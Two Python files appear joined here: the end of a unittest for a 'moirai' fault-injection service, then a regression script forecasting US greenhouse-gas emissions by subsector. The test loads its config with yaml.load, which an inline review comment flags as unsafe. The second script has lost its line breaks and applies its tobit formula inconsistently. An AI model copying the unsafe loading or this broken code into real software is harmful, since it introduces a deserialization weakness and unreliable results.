        server_list = ['localhost']
        self.command_id = 0
        event_list_cnt = 4
        # Create the reply fifo this test will listen on; reuse it if a
        # previous run left it behind.
        try:
            os.mkfifo(TMP_FIFO)
        except (IOError, OSError):
            print ("the temp fifo file already exists, moving along")
        self.api_fifo_path = TMP_FIFO
        # NOTE(review): yaml.load without a Loader executes arbitrary YAML
        # tags -- fine for a trusted test fixture, but yaml.safe_load would
        # be the safer default.
        with open(MOIRAI_CONFIG_DIR + CORRECT_FATEBOOK + '/api.yaml') \
                as conf_fd:
            self.api_config = yaml.load(conf_fd)
        try:
            api_fifo_fd = os.open(TMP_FIFO, os.O_NONBLOCK)
            self.api_fifo_file = os.fdopen(api_fifo_fd)
        except (IOError, OSError):
            self.assert_(False)
        # Test the list command
        status, output = self.execute_command('list', {})
        if status == -1:
            self.assert_(False)
        self.assertEqual(json.loads(output), expected_list_op)
        # check plan: every event maps known failures to positive timestamps
        status, output = self.execute_command('plan',
                                              {'service_name':
                                               'test_service'})
        if status == -1:
            self.assert_(False)
        output_list = json.loads(output)
        for event in output_list:
            for failure, trigger_time in event.iteritems():
                try:
                    time_stmp = int(trigger_time)
                    if time_stmp <= 0:
                        self.assert_(False)
                except:
                    self.assert_(False)
                if failure not in failure_list:
                    self.assert_(False)
        # check servers
        status, output = self.execute_command('servers',
                                              {'service_name':
                                               'test_service'})
        if status == -1:
            self.assert_(False)
        print (output)
        output_list = json.loads(output)
        for server in output_list:
            if server not in server_list:
                self.assert_(False)
        # check events: each event record carries event_list_cnt fields
        status, output = self.execute_command('events',
                                              {'service_name':
                                               'test_service'})
        if status == -1:
            self.assert_(False)
        output_list = json.loads(output)
        for event in output_list:
            self.assertEqual(len(event), event_list_cnt)
        moirai_obj.finish()
        # check unknown commands
        status, output = self.execute_command('dummy',
                                              {'service_name':
                                               'test_service'})
        if status == -1:
            self.assert_(False)
        # check incorrect message: a timeout (-1) is the expected outcome
        status = self.execute_incorrect_command()
        print status
        if status != -1:
            self.assert_(False)


if __name__ == '__main__':
    unittest.main()
<gh_stars>0 # This script uses an AR1 autoregressive model to forecast aggregated subsector level emissions of GHG in the US # Importing required modules import numpy as np import pandas as pd import statsmodels.api as stats import matplotlib.pyplot as plt from scipy.stats import norm # Declaring filepaths for data files arpath = 'C:/Users/User/Documents/Data/state_level_ardata.csv' epapath = 'C:/Users/User/Documents/Data/EPAGHGdata.csv' gdp_filepath = 'C:/Users/User/Documents/Data/gdp_reg_data.csv' ratiopath = 'C:/Users/User/Documents/Data/ghg_ratio_data.csv' # Structuring the dataframes for regression data = pd.read_csv(arpath) state_dummies = pd.get_dummies(data['State']) Y_Energy = data['Energy_Delta'] Y_Commercial = data['Commercial_Delta'] Y_Residential = data['Residential_Delta'] Y_Industrial = data['Industrial_Delta'] Y_Transportation = data['Transportation_Delta'] Y_Electric_Power = data['Electric_Power_Delta'] Y_Fugitive = data['Fugitive_Delta'] X_Energy = data[['GDP_per_capita', 'Population_Density', 'Renewables', 'HDD', 'CDD']] X_Commercial = data[['GDP_per_capita', 'Population_Density', 'Renewables', 'HDD', 'CDD']] X_Residential = data[['GDP_per_capita', 'Population_Density', 'Renewables', 'HDD', 'CDD']] X_Industrial = data[['GDP_per_capita', 'Population_Density', 'Renewables', 'HDD', 'CDD']] X_Transportation = data[['GDP_per_capita', 'Population_Density', 'Renewables', 'HDD', 'CDD']] X_Electric_Power = data[['GDP_per_capita', 'Population_Density', 'Renewables', 'HDD', 'CDD']] X_Fugitive = data[['GDP_per_capita', 'Population_Density', 'Renewables', 'HDD', 'CDD']] # Running AR-1 regression models with EKC Hypothesis format # Emissions from energy energy_model = stats.OLS(Y_Energy.astype(float), X_Energy.astype(float)) energy_results = energy_model.fit() print(energy_results.summary()) file = open('C:/Users/User/Documents/Data/Regression_Outputs/Linear/energy_model.txt', 'w') file.write(energy_results.summary().as_text()) file.close() # Emissions from 
commercial commercial_model = stats.OLS(Y_Commercial.astype(float), X_Commercial.astype(float)) commercial_results = commercial_model.fit() print(commercial_results.summary()) file = open('C:/Users/User/Documents/Data/Regression_Outputs/Linear/commercial_model.txt', 'w') file.write(commercial_results.summary().as_text()) file.close() # Emissions from residential residential_model = stats.OLS(Y_Residential.astype(float), X_Residential.astype(float)) residential_results = residential_model.fit() print(residential_results.summary()) file = open('C:/Users/User/Documents/Data/Regression_Outputs/Linear/residential_model.txt', 'w') file.write(residential_results.summary().as_text()) file.close() # Emissions from industry industrial_model = stats.OLS(Y_Industrial.astype(float), X_Industrial.astype(float)) industrial_results = industrial_model.fit() print(industrial_results.summary()) file = open('C:/Users/User/Documents/Data/Regression_Outputs/Linear/industrial_model.txt', 'w') file.write(industrial_results.summary().as_text()) file.close() # Emissions from transportation transportation_model = stats.OLS(Y_Transportation.astype(float), X_Transportation.astype(float)) transportation_results = transportation_model.fit() print(transportation_results.summary()) file = open('C:/Users/User/Documents/Data/Regression_Outputs/Linear/transportation_model.txt', 'w') file.write(transportation_results.summary().as_text()) file.close() # Emissions from electric power electric_model = stats.OLS(Y_Electric_Power.astype(float), X_Electric_Power.astype(float)) electric_results = electric_model.fit() print(electric_results.summary()) file = open('C:/Users/User/Documents/Data/Regression_Outputs/Linear/electric_model.txt', 'w') file.write(electric_results.summary().as_text()) file.close() # Fugitive emissions in energy fugitive_model = stats.OLS(Y_Fugitive.astype(float), X_Fugitive.astype(float)) fugitive_results = fugitive_model.fit() print(fugitive_results.summary()) file = 
open('C:/Users/User/Documents/Data/Regression_Outputs/Linear/fugitive_model.txt', 'w') file.write(fugitive_results.summary().as_text()) file.close() # Forecasting Population Density # Generate list of states and obtain parameters for forecasts States = list(data.State.unique()) # Find time trend for population density pop_params = [[],[]] y = [i for i in range(21)] y = stats.add_constant(y) for state in States: pop_temp = [] for i in range(len(data)): if data.State[i] == state: pop_temp.append(data.Population_Density[i]) temp_pop_mod = stats.OLS(pop_temp, y) temp_pop_res = temp_pop_mod.fit() pop_params[0].append(temp_pop_res.params[0]) pop_params[1].append(temp_pop_res.params[1]) # Create dataframe with pandas to record trends d = {'State':States, 'PD_int':pop_params[0], 'PD_slope':pop_params[1]} params_df = pd.DataFrame(d) print(params_df) # Forecasting Fossil Fuel Usage # Find time trend for fossil fuel usage ff_params = [[],[]] for state in States: ff_temp = [] for i in range(len(data)): if data.State[i] == state: ff_temp.append(data.Renewables[i]) temp_ff_mod = stats.OLS(ff_temp, y) temp_ff_res = temp_ff_mod.fit() ff_params[0].append(temp_ff_res.params[0]) ff_params[1].append(temp_ff_res.params[1]) # Create dataframe with pandas to record trends dff = {'State':States, 'FF_int':ff_params[0], 'FF_slope':ff_params[1]} ffparams_df = pd.DataFrame(dff) print(ffparams_df) # Forecasting Heating Degree Days # Find time trend for HDD HDD_params = [[],[]] for state in States: HDD_temp = [] for i in range(len(data)): if data.State[i] == state: HDD_temp.append(data.HDD[i]) temp_HDD_mod = stats.OLS(HDD_temp, y) temp_HDD_res = temp_HDD_mod.fit() HDD_params[0].append(temp_HDD_res.params[0]) HDD_params[1].append(temp_HDD_res.params[1]) # Create dataframe with pandas to record trends HDD = {'State':States, 'HDD_int':HDD_params[0], 'HDD_slope':HDD_params[1]} HDDparams_df = pd.DataFrame(HDD) print(HDDparams_df) # Forecasting Cooling Degree Days # Find time trend for CDD CDD_params 
= [[],[]] for state in States: CDD_temp = [] for i in range(len(data)): if data.State[i] == state: CDD_temp.append(data.CDD[i]) temp_CDD_mod = stats.OLS(CDD_temp, y) temp_CDD_res = temp_CDD_mod.fit() CDD_params[0].append(temp_CDD_res.params[0]) CDD_params[1].append(temp_CDD_res.params[1]) # Create dataframe with pandas to record trends CDD = {'State':States, 'CDD_int':CDD_params[0], 'CDD_slope':CDD_params[1]} CDDparams_df = pd.DataFrame(CDD) print(CDDparams_df) # Forecast state level total GHG emissions # First estimate state level GDP growth rates via the following model # \ln{\left(\frac{y_{i,t}}{y_{i,t-1}}\right)} = \gamma_{0,t} + \gamma_{1}\ln{(y_{i,t-1})} + \gamma_{2}\ln{(y_{i,t-1}^{2})} + \theta_{i,t} # Create dataframe with all data needed for this regression gdp_data = pd.read_csv(gdp_filepath) gdp_params = [[],[],[]] for state in States: print(state) temp1 = [] temp2 = [] y = [] for i in range(len(gdp_data)): if gdp_data.State[i] == state: temp1.append(gdp_data.ln_GDP[i]) temp2.append(gdp_data.ln_GDP_2[i]) y.append(gdp_data.Y[i]) temp1 = pd.DataFrame(temp1) temp1.rename(columns = {0:'ln_GDP'}, inplace = True) temp2 = pd.DataFrame(temp2) temp2.rename(columns = {0:'ln_GDP_2'}, inplace = True) x = pd.concat([temp1, temp2], axis = 1) x = stats.add_constant(x) y = pd.DataFrame(y) y.rename(columns = {0:'Y'}, inplace = True) temp_gdp_mod = stats.OLS(y, x) temp_gdp_res = temp_gdp_mod.fit() print(temp_gdp_res.summary()) gdp_params[0].append(temp_gdp_res.params[0]) gdp_params[1].append(temp_gdp_res.params[1]) gdp_params[2].append(temp_gdp_res.params[2]) dgdp = {'State':States, 'gamma_0':gdp_params[0], 'gamma_1':gdp_params[1], 'gamma_2':gdp_params[2]} GDP_df = pd.DataFrame(dgdp) GDP_df.to_csv('C:/Users/User/Documents/Data/Regression_Outputs/Linear/gdp_forecast.txt', index = False) # Unpack these ln-ratio estimates into actual forecasted data gdp_data2 = GDP_df gdp_forc = [] for state in States: fgdp = [] fgdp1 = [] fgdp2 = [] for i in range(len(data)): if 
data['State'][i] == state: fgdp.append(data.GDP_per_capita[i]) fgdp1.append(np.log(data.GDP_per_capita[i])) fgdp2.append(np.log(data.GDP_per_capita_2[i])) idx = gdp_data2[gdp_data2['State'] == state].index.values.astype(int)[0] for i in range(21,121): fgdp1.append((fgdp1[i-1] + gdp_data2['gamma_0'][idx] + gdp_data2['gamma_1'][idx]*fgdp1[i-1] + gdp_data2['gamma_2'][idx]*fgdp2[i-1])) fgdp.append(np.exp(fgdp1[i])) fgdp2.append(np.log(fgdp[i]**2)) gdp_forc.append(fgdp) gdpforcdic = {'State':States, 'forecasted_gdp_per_capita':gdp_forc} GDP_df = pd.DataFrame(gdpforcdic) GDP_df.to_csv('C:/Users/User/Documents/Data/Regression_Outputs/Linear/gdp_forecast.txt', index = False) # Second estimate future population densities, fossil fuel usages, HDD, and CDD pop_den_forecast = [] ff_forecast = [] HDD_forecast = [] CDD_forecast = [] for state in States: idx = params_df[params_df['State'] == state].index.values.astype(int)[0] temp = [(params_df['PD_int'][idx] + params_df['PD_slope'][idx]*i) for i in range(22,122)] temp2 = [(ffparams_df['FF_int'][idx] + ffparams_df['FF_slope'][idx]*i) for i in range (22,122)] tempH = [(HDDparams_df['HDD_int'][idx] + HDDparams_df['HDD_slope'][idx]*i) for i in range (22,122)] tempC = [(CDDparams_df['CDD_int'][idx] + CDDparams_df['CDD_slope'][idx]*i) for i in range (22,122)] pop_den_forecast.append(temp) ff_forecast.append(temp2) HDD_forecast.append(tempH) CDD_forecast.append(tempC) pdforc = {'State':States, 'forecasted_PD':pop_den_forecast, 'forecasted_FF':ff_forecast, 'forecasted_HDD':HDD_forecast, 'forecasted_CDD':CDD_forecast} PD_df = pd.DataFrame(pdforc) PD_df.to_csv('C:/Users/User/Documents/Data/Regression_Outputs/Linear/pd_ff_forecast.txt', index = False) # Third get raw estimates of state level forecasted emissions forecasted_energy_ghg = [] ar_usage = data.iloc[960::].set_index('State') beta = energy_results.params for state in States: temp = [] idx = GDP_df[GDP_df['State'] == state].index.values.astype(int)[0] lag_val = 
ar_usage.Energy[state] for i in range(6): try: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i] + beta[state])) lag_val = temp[len(temp)-1] except: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i])) lag_val = temp[len(temp)-1] forecasted_energy_ghg.append(temp) energy_forcdic = {'State':States, 'Forecasted_Energy_GHG':forecasted_energy_ghg} energy_forc_df = pd.DataFrame(energy_forcdic) print(energy_forc_df) energy_forc_df.to_csv('C:/Users/User/Documents/Data/Regression_Outputs/Linear/ENERGY_GHG_FORECAST.txt', index = False) # Aggregating energy production derived GHG emissions for the US historical = np.zeros(21) US_energy_GHG = np.zeros(len(energy_forc_df['Forecasted_Energy_GHG'][0])) agg_energy = [] for state in States: temp = [] for i in range(len(data)): if data.State[i] == state: temp.append(data.Energy[i]) agg_energy.append(temp) for i in range(21): for j in range(len(agg_energy)): historical[i] += agg_energy[j][i] for i in range(len(energy_forc_df)): for j in range(len(energy_forc_df['Forecasted_Energy_GHG'][0])): US_energy_GHG[j] += energy_forc_df['Forecasted_Energy_GHG'][i][j] ratiodata = pd.read_csv(ratiopath) ratio_mean = np.mean(ratiodata.Ratio) US_energy_GHG = US_energy_GHG / ratio_mean # Fourth use calculated growth rates and population denisties to forecast emissions via following tobit model # \hat{m}_{i,t} = \Phi(\frac{\hat{m}_{i,t}}{\sigma})\ast\hat{m}_{i,t} + \hat{\sigma}\ast\phi(\hat{m}_{i,t}) # Find \sigma as the standard deviation of the residuals from each model residual_means = np.mean(energy_results.resid) residual_std = np.std(energy_results.resid) # Estimate the tobit transformed forecasts # Defining function for the tobit 
transformation def tobit_transform(x,s): out = x*norm.cdf(x/s) + s*norm.pdf(x) return out # Performing the tobit transformation on the data # Transforming the forecasts with the tobit transform for i in range(len(US_energy_GHG)): US_energy_GHG[i] = tobit_transform(US_energy_GHG[i], residual_std) # Create a scatter plot of historical aggregated US GHG emissions from energy production from pylab import rcParams rcParams['figure.figsize'] = 8.5, 8.5 cm = plt.get_cmap('gist_rainbow') plt.figure(0) basis = [i for i in range(1991,2012)] plt.plot(basis, historical, label = 'Historical Data') # Add titles plt.title('Historical Data', loc = 'center', fontsize = 12, fontweight = 40, color = 'black') plt.xlabel('Year') plt.ylabel('GHG Emissions in Mt CO2 Equivalent') # Save the figure plt.savefig('C:/Users/User/Documents/Data/Regression_Outputs/Linear/historical.eps') # Create scatter plots for forecasted aggreagated US GHG emissions from energy production plt.figure(1) basis = [i for i in range(2012,2018)] plt.plot(basis, US_energy_GHG, label = 'AR-1 EKC', color = cm(00)) # Add legend plt.legend(loc = 8, ncol = 2) # Add titles plt.title('Aggregated GHG Emissions from Energy Production', loc = 'center', fontsize = 12, fontweight = 40, color = 'black') plt.xlabel('Year') plt.ylabel('GHG Emissions in Mt CO2 Equivalent') # Save the figure plt.savefig('C:/Users/User/Documents/Data/Regression_Outputs/Linear/forecasts_all.eps') # State level plots plt.figure(2) for i in range(len(States)): plt.plot(basis, energy_forc_df['Forecasted_Energy_GHG'][i]) # Add titles and save plt.title('State-wise GHG Emissions from Energy Production', loc = 'center', fontsize = 12, fontweight = 40, color = 'black') plt.xlabel('Year') plt.ylabel('GHG Emissions in Mt CO2 Equivalent') plt.savefig('C:/Users/User/Documents/Data/Regression_Outputs/Linear/all_states_model.eps') # Do subsetor analyses to provide a more in depth analysis of energy production based GHG emissions # Get raw estimates of state level 
forecasted emissions for the following cases: forecasted_commercial_ghg = [] beta = commercial_results.params for state in States: temp = [] idx = GDP_df[GDP_df['State'] == state].index.values.astype(int)[0] lag_val = ar_usage.Commercial[state] for i in range(6): try: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i] + beta[state])) lag_val = temp[len(temp)-1] except: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i])) lag_val = temp[len(temp)-1] forecasted_commercial_ghg.append(temp) commercial_forcdic = {'State':States, 'Forecasted_commercial_GHG':forecasted_commercial_ghg} commercial_forc_df = pd.DataFrame(commercial_forcdic) print(commercial_forc_df) commercial_forc_df.to_csv('C:/Users/User/Documents/Data/Regression_Outputs/Linear/commercial_GHG_FORECAST.txt', index = False) # Aggregating commercial production derived GHG emissions for the US US_commercial_historical = np.zeros(21) US_commercial_GHG = np.zeros(len(commercial_forc_df['Forecasted_commercial_GHG'][0])) agg_commercial = [] for state in States: temp = [] for i in range(len(data)): if data.State[i] == state: temp.append(data.Commercial[i]) agg_commercial.append(temp) for i in range(21): for j in range(len(agg_commercial)): US_commercial_historical[i] += agg_commercial[j][i] for i in range(len(commercial_forc_df)): for j in range(len(commercial_forc_df['Forecasted_commercial_GHG'][0])): US_commercial_GHG[j] += commercial_forc_df['Forecasted_commercial_GHG'][i][j] # Fourth use calculated growth rates and population denisties to forecast emissions via following tobit model # \hat{m}_{i,t} = \Phi(\frac{\hat{m}_{i,t}}{\sigma})\ast\hat{m}_{i,t} + \hat{\sigma}\ast\phi(\hat{m}_{i,t}) # Find \sigma 
as the standard deviation of the residuals from each model residual_means = np.mean(commercial_results.resid) residual_std = np.std(commercial_results.resid) # Estimate the tobit transformed forecasts # Performing the tobit transformation on the data # Transforming the forecasts with the tobit transform for i in range(len(US_commercial_GHG)): US_commercial_GHG[i] = tobit_transform(US_commercial_GHG[i], residual_std) # Do subsetor analyses to provide a more in depth analysis of energy production based GHG emissions # Get raw estimates of state level forecasted emissions for the following cases: forecasted_residential_ghg = [] beta = residential_results.params for state in States: temp = [] idx = GDP_df[GDP_df['State'] == state].index.values.astype(int)[0] lag_val = ar_usage.Residential[state] for i in range(6): try: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i] + beta[state])) lag_val = temp[len(temp)-1] except: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i])) lag_val = temp[len(temp)-1] forecasted_residential_ghg.append(temp) residential_forcdic = {'State':States, 'Forecasted_residential_GHG':forecasted_residential_ghg} residential_forc_df = pd.DataFrame(residential_forcdic) print(residential_forc_df) residential_forc_df.to_csv('C:/Users/User/Documents/Data/Regression_Outputs/Linear/residential_GHG_FORECAST.txt', index = False) # Aggregating residential production derived GHG emissions for the US US_residential_historical = np.zeros(21) US_residential_GHG = np.zeros(len(residential_forc_df['Forecasted_residential_GHG'][0])) agg_residential = [] for state in States: temp = [] for i in range(len(data)): if data.State[i] == state: 
temp.append(data.Residential[i]) agg_residential.append(temp) for i in range(21): for j in range(len(agg_residential)): US_residential_historical[i] += agg_residential[j][i] for i in range(len(residential_forc_df)): for j in range(len(residential_forc_df['Forecasted_residential_GHG'][0])): US_residential_GHG[j] += residential_forc_df['Forecasted_residential_GHG'][i][j] # Fourth use calculated growth rates and population denisties to forecast emissions via following tobit model # \hat{m}_{i,t} = \Phi(\frac{\hat{m}_{i,t}}{\sigma})\ast\hat{m}_{i,t} + \hat{\sigma}\ast\phi(\hat{m}_{i,t}) # Find \sigma as the standard deviation of the residuals from each model residual_means = np.mean(residential_results.resid) residual_std = np.std(residential_results.resid) # Estimate the tobit transformed forecasts # Performing the tobit transformation on the data # Transforming the forecasts with the tobit transform for i in range(len(US_residential_GHG)): US_residential_GHG[i] = tobit_transform(US_residential_GHG[i], residual_std) # Do subsetor analyses to provide a more in depth analysis of energy production based GHG emissions # Get raw estimates of state level forecasted emissions for the following cases: forecasted_industrial_ghg = [] beta = industrial_results.params for state in States: temp = [] idx = GDP_df[GDP_df['State'] == state].index.values.astype(int)[0] lag_val = ar_usage.Industrial[state] for i in range(6): try: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i] + beta[state])) lag_val = temp[len(temp)-1] except: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i])) lag_val = temp[len(temp)-1] forecasted_industrial_ghg.append(temp) industrial_forcdic = 
{'State':States, 'Forecasted_industrial_GHG':forecasted_industrial_ghg} industrial_forc_df = pd.DataFrame(industrial_forcdic) print(industrial_forc_df) industrial_forc_df.to_csv('C:/Users/User/Documents/Data/Regression_Outputs/Linear/industrial_GHG_FORECAST.txt', index = False) # Aggregating industrial production derived GHG emissions for the US US_industrial_historical = np.zeros(21) US_industrial_GHG = np.zeros(len(industrial_forc_df['Forecasted_industrial_GHG'][0])) agg_industrial = [] for state in States: temp = [] for i in range(len(data)): if data.State[i] == state: temp.append(data.Industrial[i]) agg_industrial.append(temp) for i in range(21): for j in range(len(agg_industrial)): US_industrial_historical[i] += agg_industrial[j][i] for i in range(len(industrial_forc_df)): for j in range(len(industrial_forc_df['Forecasted_industrial_GHG'][0])): US_industrial_GHG[j] += industrial_forc_df['Forecasted_industrial_GHG'][i][j] # Fourth use calculated growth rates and population denisties to forecast emissions via following tobit model # \hat{m}_{i,t} = \Phi(\frac{\hat{m}_{i,t}}{\sigma})\ast\hat{m}_{i,t} + \hat{\sigma}\ast\phi(\hat{m}_{i,t}) # Find \sigma as the standard deviation of the residuals from each model residual_means = np.mean(industrial_results.resid) residual_std = np.std(industrial_results.resid) # Estimate the tobit transformed forecasts # Performing the tobit transformation on the data # Transforming the forecasts with the tobit transform for i in range(len(US_industrial_GHG)): US_industrial_GHG[i] = tobit_transform(US_industrial_GHG[i], residual_std) # Do subsetor analyses to provide a more in depth analysis of energy production based GHG emissions # Get raw estimates of state level forecasted emissions for the following cases: forecasted_transportation_ghg = [] beta = transportation_results.params for state in States: temp = [] idx = GDP_df[GDP_df['State'] == state].index.values.astype(int)[0] lag_val = ar_usage.Transportation[state] for i in 
range(6): try: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i] + beta[state])) lag_val = temp[len(temp)-1] except: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i])) lag_val = temp[len(temp)-1] forecasted_transportation_ghg.append(temp) transportation_forcdic = {'State':States, 'Forecasted_transportation_GHG':forecasted_transportation_ghg} transportation_forc_df = pd.DataFrame(transportation_forcdic) print(transportation_forc_df) transportation_forc_df.to_csv('C:/Users/User/Documents/Data/Regression_Outputs/Linear/transportation_GHG_FORECAST.txt', index = False) # Aggregating transportation production derived GHG emissions for the US US_transportation_historical = np.zeros(21) US_transportation_GHG = np.zeros(len(transportation_forc_df['Forecasted_transportation_GHG'][0])) agg_transportation = [] for state in States: temp = [] for i in range(len(data)): if data.State[i] == state: temp.append(data.Transportation[i]) agg_transportation.append(temp) for i in range(21): for j in range(len(agg_transportation)): US_transportation_historical[i] += agg_transportation[j][i] for i in range(len(transportation_forc_df)): for j in range(len(transportation_forc_df['Forecasted_transportation_GHG'][0])): US_transportation_GHG[j] += transportation_forc_df['Forecasted_transportation_GHG'][i][j] # Fourth use calculated growth rates and population denisties to forecast emissions via following tobit model # \hat{m}_{i,t} = \Phi(\frac{\hat{m}_{i,t}}{\sigma})\ast\hat{m}_{i,t} + \hat{\sigma}\ast\phi(\hat{m}_{i,t}) # Find \sigma as the standard deviation of the residuals from each model residual_means = np.mean(transportation_results.resid) residual_std = 
np.std(transportation_results.resid) # Estimate the tobit transformed forecasts # Performing the tobit transformation on the data # Transforming the forecasts with the tobit transform for i in range(len(US_transportation_GHG)): US_transportation_GHG[i] = tobit_transform(US_transportation_GHG[i], residual_std) # Do subsetor analyses to provide a more in depth analysis of energy production based GHG emissions # Get raw estimates of state level forecasted emissions for the following cases: forecasted_electric_ghg = [] beta = electric_results.params for state in States: temp = [] idx = GDP_df[GDP_df['State'] == state].index.values.astype(int)[0] lag_val = ar_usage.Electric_Power[state] for i in range(6): try: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i] + beta[state])) lag_val = temp[len(temp)-1] except: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i])) lag_val = temp[len(temp)-1] forecasted_electric_ghg.append(temp) electric_forcdic = {'State':States, 'Forecasted_electric_GHG':forecasted_electric_ghg} electric_forc_df = pd.DataFrame(electric_forcdic) print(electric_forc_df) electric_forc_df.to_csv('C:/Users/User/Documents/Data/Regression_Outputs/Linear/electric_GHG_FORECAST.txt', index = False) # Aggregating electric production derived GHG emissions for the US US_electric_historical = np.zeros(21) US_electric_GHG = np.zeros(len(electric_forc_df['Forecasted_electric_GHG'][0])) agg_electric = [] for state in States: temp = [] for i in range(len(data)): if data.State[i] == state: temp.append(data.Electric_Power[i]) agg_electric.append(temp) for i in range(21): for j in range(len(agg_electric)): US_electric_historical[i] += agg_electric[j][i] for i in 
range(len(electric_forc_df)): for j in range(len(electric_forc_df['Forecasted_electric_GHG'][0])): US_electric_GHG[j] += electric_forc_df['Forecasted_electric_GHG'][i][j] # Fourth use calculated growth rates and population denisties to forecast emissions via following tobit model # \hat{m}_{i,t} = \Phi(\frac{\hat{m}_{i,t}}{\sigma})\ast\hat{m}_{i,t} + \hat{\sigma}\ast\phi(\hat{m}_{i,t}) # Find \sigma as the standard deviation of the residuals from each model residual_means = np.mean(electric_results.resid) residual_std = np.std(electric_results.resid) # Estimate the tobit transformed forecasts # Performing the tobit transformation on the data # Transforming the forecasts with the tobit transform for i in range(len(US_electric_GHG)): US_electric_GHG[i] = tobit_transform(US_electric_GHG[i], residual_std) # Do subsetor analyses to provide a more in depth analysis of energy production based GHG emissions # Get raw estimates of state level forecasted emissions for the following cases: forecasted_fugitive_ghg = [] beta = fugitive_results.params for state in States: temp = [] idx = GDP_df[GDP_df['State'] == state].index.values.astype(int)[0] lag_val = ar_usage.Fugitive[state] for i in range(6): try: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i] + beta[state])) lag_val = temp[len(temp)-1] except: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i])) lag_val = temp[len(temp)-1] forecasted_fugitive_ghg.append(temp) fugitive_forcdic = {'State':States, 'Forecasted_fugitive_GHG':forecasted_fugitive_ghg} fugitive_forc_df = pd.DataFrame(fugitive_forcdic) print(fugitive_forc_df) 
fugitive_forc_df.to_csv('C:/Users/User/Documents/Data/Regression_Outputs/Linear/fugitive_GHG_FORECAST.txt', index = False) # Aggregating fugitive production derived GHG emissions for the US US_fugitive_historical = np.zeros(21) US_fugitive_GHG = np.zeros(len(fugitive_forc_df['Forecasted_fugitive_GHG'][0])) agg_fugitive = [] for state in States: temp = [] for i in range(len(data)): if data.State[i] == state: temp.append(data.Fugitive[i]) agg_fugitive.append(temp) for i in range(21): for j in range(len(agg_fugitive)): US_fugitive_historical[i] += agg_fugitive[j][i] for i in range(len(fugitive_forc_df)): for j in range(len(fugitive_forc_df['Forecasted_fugitive_GHG'][0])): US_fugitive_GHG[j] += fugitive_forc_df['Forecasted_fugitive_GHG'][i][j] # Fourth use calculated growth rates and population denisties to forecast emissions via following tobit model # \hat{m}_{i,t} = \Phi(\frac{\hat{m}_{i,t}}{\sigma})\ast\hat{m}_{i,t} + \hat{\sigma}\ast\phi(\hat{m}_{i,t}) # Find \sigma as the standard deviation of the residuals from each model residual_means = np.mean(fugitive_results.resid) residual_std = np.std(fugitive_results.resid) # Estimate the tobit transformed forecasts # Performing the tobit transformation on the data # Transforming the forecasts with the tobit transform for i in range(len(US_fugitive_GHG)): US_fugitive_GHG[i] = tobit_transform(US_fugitive_GHG[i], residual_std) # Lastly, aggregate subsector emissions forecasts and compare to energy emissions forecasts subsector_aggregated = US_commercial_GHG + US_residential_GHG + US_industrial_GHG + US_transportation_GHG + US_electric_GHG + US_fugitive_GHG subsector_aggregated = subsector_aggregated / ratio_mean # Plotting subsector forecasts against estimated forecasts using percentages of full energy sector # Because of the nature of these plots, this section is abandoned -- we will not use % estiamtes for anything, just use the subsector forecasts # Plotting subsector forecasts for all subsectors grouped by model type 
